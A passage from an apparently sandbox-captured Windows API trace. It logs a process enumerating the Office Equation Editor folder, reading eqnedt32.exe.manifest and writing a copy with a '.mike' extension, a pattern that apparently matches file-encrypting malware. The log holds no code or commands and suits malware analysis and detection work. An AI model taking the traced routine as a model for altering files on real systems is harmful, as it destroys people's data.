cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0042.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0042.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 0 [0042.062] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.062] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpFilePart=0x0) returned 0x37 [0042.062] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.063] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.063] CoTaskMemFree (pv=0x4fe370) [0042.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.063] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpFilePart=0x0) returned 0x37 [0042.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.063] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpFilePart=0x0) returned 0x37 [0042.063] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpFilePart=0x0) returned 0x38 [0042.063] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.064] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.064] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0042.064] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0042.064] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0042.064] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0042.065] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0042.065] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0042.065] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.065] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpFilePart=0x0) returned 0x44 [0042.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpFilePart=0x0) returned 0x44 [0042.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0042.066] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.081] GetFileType (hFile=0x264) returned 0x1 [0042.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0042.081] GetFileType (hFile=0x264) returned 0x1 [0042.081] CloseHandle (hObject=0x264) returned 1 [0042.081] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.081] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.081] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0042.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0042.082] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0042.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.082] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), fInfoLevelId=0x0, lpFileInformation=0x2215818 | out: lpFileInformation=0x2215818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236)) returned 1 [0042.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.082] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), fInfoLevelId=0x0, lpFileInformation=0x2215b5c | out: lpFileInformation=0x2215b5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236)) returned 1 [0042.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", lpFilePart=0x0) returned 0x52 [0042.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.082] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.083] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.083] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.083] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", lpFilePart=0x0) returned 0x52 [0042.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0042.083] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0042.083] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", lpFilePart=0x0) returned 0x52 [0042.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.083] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.084] GetFileType (hFile=0x264) returned 0x1 [0042.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.084] GetFileType (hFile=0x264) returned 0x1 [0042.084] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0042.084] WriteFile (in: hFile=0x264, lpBuffer=0x2216ae0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2216ae0*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0042.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0042.085] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), fInfoLevelId=0x0, lpFileInformation=0x2216598 | out: lpFileInformation=0x2216598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236)) returned 1 [0042.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0042.085] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.085] GetFileType (hFile=0x264) returned 0x1 [0042.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.085] GetFileType (hFile=0x264) returned 0x1 [0042.085] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0042.085] ReadFile (in: hFile=0x264, lpBuffer=0x2217c28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2217c28*, lpNumberOfBytesRead=0x2af0c8*=0x236, lpOverlapped=0x0) returned 1 [0042.086] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", lpFilePart=0x0) returned 0x52 [0042.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.087] GetFileType (hFile=0x264) returned 0x1 [0042.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.087] GetFileType (hFile=0x264) returned 0x1 [0042.087] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0042.087] WriteFile (in: hFile=0x264, lpBuffer=0x221b85c*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x221b85c*, lpNumberOfBytesWritten=0x2af0bc*=0x240, lpOverlapped=0x0) returned 1 [0042.087] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", lpFilePart=0x0) returned 0x52 [0042.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0042.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.087] GetFileType (hFile=0x264) returned 0x1 [0042.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0042.087] GetFileType (hFile=0x264) returned 0x1 [0042.088] WriteFile (in: hFile=0x264, lpBuffer=0x221eaa8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x221eaa8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0042.089] CloseHandle (hObject=0x264) returned 1 [0042.089] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", lpFilePart=0x0) returned 0x52 [0042.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.090] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3497c60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3497c60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3497c60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x460)) returned 1 [0042.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike", lpFilePart=0x0) returned 0x52 [0042.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.090] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.mike"), fInfoLevelId=0x0, lpFileInformation=0x2220248 | out: lpFileInformation=0x2220248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3497c60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3497c60, 